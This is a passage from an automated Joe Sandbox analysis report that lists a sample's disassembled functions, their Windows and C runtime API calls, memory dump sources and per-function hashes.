                            • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 006A8625
                            • WriteFile.KERNEL32(?,00000000,00000000,006A8C9C,00000000,?,?,?,?,?,?,?,?,?,006A8C9C,00000003), ref: 006A8644
                            • WriteFile.KERNEL32(?,00000003,00000001,006A8C9C,00000000,?,?,?,?,?,?,?,?,?,006A8C9C,00000003), ref: 006A867D
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                            • String ID:
                            • API String ID: 1324828854-0
                            • Opcode ID: a4fb15a280a3df87c7f1162d6d12aa4791068cc59d807f6e0048688618483a99
                            • Instruction ID: 4af2083b363394f3ca84eaff485e078f5c9dece442a29705e769d0c756245d66
                            • Opcode Fuzzy Hash: a4fb15a280a3df87c7f1162d6d12aa4791068cc59d807f6e0048688618483a99
                            • Instruction Fuzzy Hash: 1051B4B09002499FDF10DFA8D885AEEBBFAEF0A300F14415AE955E7291DB70AD41CF64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID: &amp;$&apos;$&gt;$&lt;$&quot;
                            • API String ID: 3519838083-87953025
                            • Opcode ID: 0d17481fadc63b184b842f39d9755eae4be313e2e97948c019425df2077dd0bf
                            • Instruction ID: bc46da44195ae29228bd5d2a7b02967f5d602946dce344660bc559aafc266b8c
                            • Opcode Fuzzy Hash: 0d17481fadc63b184b842f39d9755eae4be313e2e97948c019425df2077dd0bf
                            • Instruction Fuzzy Hash: 6241E470A15614EFCB05DFA8DA856ADBBB4FF05B04F10411FE401A7251EBB89E42CB9B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004B1286
                            • std::exception::exception.LIBCONCRT ref: 004B1345
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004B1372
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Exception@8H_prologThrowstd::exception::exception
                            • String ID: 4s$expected <$text
                            • API String ID: 1340123063-3308706680
                            • Opcode ID: f4b596e56b0b1e3a52c4a593168d4f51ed1d5adf09de71704b99ce2e3d2e4687
                            • Instruction ID: d9546ddd135b8cf094cca5dbe347f790c9c69720d7cdc24981f0c33ca2c0f014
                            • Opcode Fuzzy Hash: f4b596e56b0b1e3a52c4a593168d4f51ed1d5adf09de71704b99ce2e3d2e4687
                            • Instruction Fuzzy Hash: 7531C771D00349ABDF10CF69C450AEABBE4BF14350B44426EEC54EB791D379D901CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 006B308B: _free.LIBCMT ref: 006B30B4
                            • _free.LIBCMT ref: 006B3392
                              • Part of subcall function 006A071F: RtlFreeHeap.NTDLL(00000000,00000000,?,006B30B9,?,00000000,?,00000000,?,006B335D,?,00000007,?,?,006B3746,?), ref: 006A0735
                              • Part of subcall function 006A071F: GetLastError.KERNEL32(?,?,006B30B9,?,00000000,?,00000000,?,006B335D,?,00000007,?,?,006B3746,?,?), ref: 006A0747
                            • _free.LIBCMT ref: 006B339D
                            • _free.LIBCMT ref: 006B33A8
                            • _free.LIBCMT ref: 006B33FC
                            • _free.LIBCMT ref: 006B3407
                            • _free.LIBCMT ref: 006B3412
                            • _free.LIBCMT ref: 006B341D
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: f819d8ee9315130b76aef7c0222032d4a6c7d3fe797d2f4f8e954e2ed7a91756
                            • Instruction ID: f8fa9848ae50d5837f6260adba8007ed8adb660ecc6370a83eee419dea8051ce
                            • Opcode Fuzzy Hash: f819d8ee9315130b76aef7c0222032d4a6c7d3fe797d2f4f8e954e2ed7a91756
                            • Instruction Fuzzy Hash: 361172B1640718E6D5A0B770CC47FCB779E5F05700F40081CB299662E3DB34BA544B55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetLastError.KERNEL32(?,?,006900F3,0068F54D,00582AB1,0000000C,00582D94,?,?,?,?,00413A42,?,?), ref: 0069010A
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00690118
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00690131
                            • SetLastError.KERNEL32(00000000,?,006900F3,0068F54D,00582AB1,0000000C,00582D94,?,?,?,?,00413A42,?,?), ref: 00690183
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastValue___vcrt_
                            • String ID:
                            • API String ID: 3852720340-0
                            • Opcode ID: 02db73689464d0444471c03415435b1de11366a082ae9b0df417eb982edcdb78
                            • Instruction ID: d11d2948e26b249223f5eba63a445aae939a2f14cc7691c44b8471b0f6637430
                            • Opcode Fuzzy Hash: 02db73689464d0444471c03415435b1de11366a082ae9b0df417eb982edcdb78
                            • Instruction Fuzzy Hash: 8401F13220D3216EBB6027B4AC86566265BDB07374730472FF610856F2EF215C015258
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 0058661A
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00586624
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 00586644
                            • collate.LIBCPMT ref: 0058665E
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0058667B
                            • std::_Facet_Register.LIBCPMT ref: 0058669A
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005866A3
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowcollatestd::locale::_
                            • String ID:
                            • API String ID: 2345145342-0
                            • Opcode ID: 683afa396c505158beeeeb8ace92440f3687866c2c37f2ba32805dd7e5aa8164
                            • Instruction ID: 5e317d96a1dbf30aff8a3822c17898891257cb953877e46a45bff8bbf661fe95
                            • Opcode Fuzzy Hash: 683afa396c505158beeeeb8ace92440f3687866c2c37f2ba32805dd7e5aa8164
                            • Instruction Fuzzy Hash: 7E010875E0012A9BCF00FBA0C846ABD7B76BF94720F54011EF81177291DF78AE018795
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 005866B7
                            • std::_Lockit::_Lockit.LIBCPMT ref: 005866C1
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 005866E1
                            • collate.LIBCPMT ref: 005866FB
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00586718
                            • std::_Facet_Register.LIBCPMT ref: 00586737
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00586740
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowcollatestd::locale::_
                            • String ID:
                            • API String ID: 2345145342-0
                            • Opcode ID: 0acb5f08232a8573e42383827a7b808f246a0ac887cf775fa01c9283701b9942
                            • Instruction ID: 15cd7fd3c8c26779230ddd846801634f45a8de773b305829b6d06c6bd94e21bd
                            • Opcode Fuzzy Hash: 0acb5f08232a8573e42383827a7b808f246a0ac887cf775fa01c9283701b9942
                            • Instruction Fuzzy Hash: 1601E536D0012997DF10FBA0C846ABD7B72BF90724F54012EE91177291DF78AA018785
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 00586754
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0058675E
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 0058677E
                            • ctype.LIBCPMT ref: 00586798
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 005867B5
                            • std::_Facet_Register.LIBCPMT ref: 005867D4
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005867DD
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowctypestd::locale::_
                            • String ID:
                            • API String ID: 189735510-0
                            • Opcode ID: d047c7202cb365e672107b8492bac120284b965a5602e7ed5ecebbe136fec144
                            • Instruction ID: e11fefb2a72ecffb1491abc52e138d9de10666e561de059b3711717e62cc3b09
                            • Opcode Fuzzy Hash: d047c7202cb365e672107b8492bac120284b965a5602e7ed5ecebbe136fec144
                            • Instruction Fuzzy Hash: F401CE36D001299BDF00FBA0C846ABD7B72BF90724F14051EF81177291CF78AA028785
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 005867F1
                            • std::_Lockit::_Lockit.LIBCPMT ref: 005867FB
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 0058681B
                            • messages.LIBCPMT ref: 00586835
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00586852
                            • std::_Facet_Register.LIBCPMT ref: 00586871
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0058687A
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmessagesstd::locale::_
                            • String ID:
                            • API String ID: 2194591311-0
                            • Opcode ID: 31a66c2aef54546729fbc5e278748624d23b6838a7b294471b6e1c0ea853229f
                            • Instruction ID: e590f0d58e44e9733ddb287f0ca2c12532de19a3ec23654ed94b8b34b71a9dd8
                            • Opcode Fuzzy Hash: 31a66c2aef54546729fbc5e278748624d23b6838a7b294471b6e1c0ea853229f
                            • Instruction Fuzzy Hash: 6A01E172D0012A8BCF00FBA0C846ABD7BB2BF90720F54051EE91577291CF78AE028B85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 0058688E
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00586898
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 005868B8
                            • messages.LIBCPMT ref: 005868D2
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 005868EF
                            • std::_Facet_Register.LIBCPMT ref: 0058690E
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00586917
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmessagesstd::locale::_
                            • String ID:
                            • API String ID: 2194591311-0
                            • Opcode ID: d0d7d180868ba6a60cc2113eca6e935ba914a2ee46205c1a11ef25591b9f55ea
                            • Instruction ID: 5b981ecb1315f14c0bfae78f3a02e225e8b6a0d4f3834e27cb80d651ff8356d0
                            • Opcode Fuzzy Hash: d0d7d180868ba6a60cc2113eca6e935ba914a2ee46205c1a11ef25591b9f55ea
                            • Instruction Fuzzy Hash: 4201E575D0012A97CF04FBA0C8465BD7B72BF94720F14011EE911772D1CF78AE028B95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 00586B9F
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00586BA9
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 00586BC9
                            • moneypunct.LIBCPMT ref: 00586BE3
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00586C00
                            • std::_Facet_Register.LIBCPMT ref: 00586C1F
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00586C28
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
                            • String ID:
                            • API String ID: 3858443405-0
                            • Opcode ID: a431a7e3066f17ca6c6dde879a52e080e93229557c827164c6bf9d64ddbfbaef
                            • Instruction ID: 84f716b36b8fe4b0eeb5c346d4afb5d5bdea63b8828cecab74281361ddc59401
                            • Opcode Fuzzy Hash: a431a7e3066f17ca6c6dde879a52e080e93229557c827164c6bf9d64ddbfbaef
                            • Instruction Fuzzy Hash: FA018232D0012A9BCF05FBA0C8466BD7B76FF84720F54451EE91177291DF78AE028B95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 00586C3C
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00586C46
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 00586C66
                            • moneypunct.LIBCPMT ref: 00586C80
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00586C9D
                            • std::_Facet_Register.LIBCPMT ref: 00586CBC
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00586CC5
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
                            • String ID:
                            • API String ID: 3858443405-0
                            • Opcode ID: f065ec6cdf588a1e04eb21ec069a1ab8545a4c531ab3202a9d74999f1de50bb7
                            • Instruction ID: d3ca6d3b0303df7d872e8f47537471738708f80f192dbc6f870ce2738a0ab25a
                            • Opcode Fuzzy Hash: f065ec6cdf588a1e04eb21ec069a1ab8545a4c531ab3202a9d74999f1de50bb7
                            • Instruction Fuzzy Hash: A601E176E0012997DF00FBA0C856ABD7B76FF84720F54011EE91177291DF78AE028785
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 00586CD9
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00586CE3
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 00586D03
                            • moneypunct.LIBCPMT ref: 00586D1D
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00586D3A
                            • std::_Facet_Register.LIBCPMT ref: 00586D59
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00586D62
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
                            • String ID:
                            • API String ID: 3858443405-0
                            • Opcode ID: acb03900e7c652400073e6cd5399060b0ea66d0eb0d7b5cab16bad849e1c65a7
                            • Instruction ID: 7b169e9101996b769d04c76ad6e4245447e232e0c4e9294188ed1d51b17dc7a6
                            • Opcode Fuzzy Hash: acb03900e7c652400073e6cd5399060b0ea66d0eb0d7b5cab16bad849e1c65a7
                            • Instruction Fuzzy Hash: D801E571E001298BCF01FBA0CC569BD7B72BF90720F54011EE8117B291DF78AA018B85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 00586D76
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00586D80
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 00586DA0
                            • moneypunct.LIBCPMT ref: 00586DBA
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00586DD7
                            • std::_Facet_Register.LIBCPMT ref: 00586DF6
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00586DFF
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowmoneypunctstd::locale::_
                            • String ID:
                            • API String ID: 3858443405-0
                            • Opcode ID: 9cf5ef946ec30e25079d90c3c6a2712117edf0fffc5c669b95cd192a71f7b829
                            • Instruction ID: e2dcb485ef0cc89e99be61f09e5582cafe4b5cc1ebd3bfdfcf518d8b622bee66
                            • Opcode Fuzzy Hash: 9cf5ef946ec30e25079d90c3c6a2712117edf0fffc5c669b95cd192a71f7b829
                            • Instruction Fuzzy Hash: 8201E532E0012A9BDF00FBA0D8466BD7B76BF94720F54011EE81177291CF78AE028785
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 00587087
                            • std::_Lockit::_Lockit.LIBCPMT ref: 00587091
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 005870B1
                            • numpunct.LIBCPMT ref: 005870CB
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 005870E8
                            • std::_Facet_Register.LIBCPMT ref: 00587107
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00587110
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrownumpunctstd::locale::_
                            • String ID:
                            • API String ID: 639073845-0
                            • Opcode ID: 6096f5c05e7e849b781bd7e7e4d1d9f3805acc74fb4ffe7450b9d0411b96f4f8
                            • Instruction ID: bc20c7c6c020120fc78f8b37736ad502b5a0e4a9b75e94a0075530af322d9527
                            • Opcode Fuzzy Hash: 6096f5c05e7e849b781bd7e7e4d1d9f3805acc74fb4ffe7450b9d0411b96f4f8
                            • Instruction Fuzzy Hash: D7018E36D0412A97CF05FBA0C84AABD7B76BF94720F64051AE8117B291DF78EA01CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 00587124
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0058712E
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 0058714E
                            • numpunct.LIBCPMT ref: 00587168
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00587185
                            • std::_Facet_Register.LIBCPMT ref: 005871A4
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005871AD
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrownumpunctstd::locale::_
                            • String ID:
                            • API String ID: 639073845-0
                            • Opcode ID: e944d833c6a2d5a942ceeafe776d823eee5e5144d6c68859dd4be15709c9bd9e
                            • Instruction ID: 2dfbe0e2e5fa92e00c970f04d2ce521629e8d9b26fb6f897ac3351582d966bc7
                            • Opcode Fuzzy Hash: e944d833c6a2d5a942ceeafe776d823eee5e5144d6c68859dd4be15709c9bd9e
                            • Instruction Fuzzy Hash: 1201CE36E001299BCF00FBA0C84AABD7B76BFA4720F64011AE811772D1DF78AA019795
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID: Already open$Element not found$End of file$The descriptor does not fit into the select call's fd_set$asio.misc error
                            • API String ID: 3519838083-1489422305
                            • Opcode ID: 0e974919303888db856ae624f66fddceb7bc6d713ec0c067eb07c25d7527eddb
                            • Instruction ID: d67ba4f39ddab518590b04328f340580a13f1bfa5124be1068f38476ce4b5b78
                            • Opcode Fuzzy Hash: 0e974919303888db856ae624f66fddceb7bc6d713ec0c067eb07c25d7527eddb
                            • Instruction Fuzzy Hash: 3DF0A471A44128A78B20DF55A8518EFBB65FBD5760F10440BF945D2240C6F849E1878B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,006A4862,00000003,?,006A4802,00000003,00787658,0000000C,006A4915,00000003,00000002), ref: 006A488D
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006A48A0
                            • FreeLibrary.KERNEL32(00000000,?,?,?,006A4862,00000003,?,006A4802,00000003,00787658,0000000C,006A4915,00000003,00000002,00000000), ref: 006A48C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: 0A$CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-242658392
                            • Opcode ID: 9df3df2a0e177dc7cd2e605b1649d3258fc5b3d1bd9aa78d63051723fbfae371
                            • Instruction ID: 50e48b579043fcda82c136a0126160869b8aca19eaf4220f6d071175e2de8cb7
                            • Opcode Fuzzy Hash: 9df3df2a0e177dc7cd2e605b1649d3258fc5b3d1bd9aa78d63051723fbfae371
                            • Instruction Fuzzy Hash: DAF03170A00259ABEB11AB94DC49BDDBFB6EB44751F004168E805A6290DFB89E80CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004251D5
                            • EnterCriticalSection.KERNEL32(?), ref: 004251EC
                            • LeaveCriticalSection.KERNEL32(?), ref: 00425335
                            • EnterCriticalSection.KERNEL32(?), ref: 0042539A
                            • EnterCriticalSection.KERNEL32(?), ref: 004253CB
                            • LeaveCriticalSection.KERNEL32(?), ref: 00425459
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
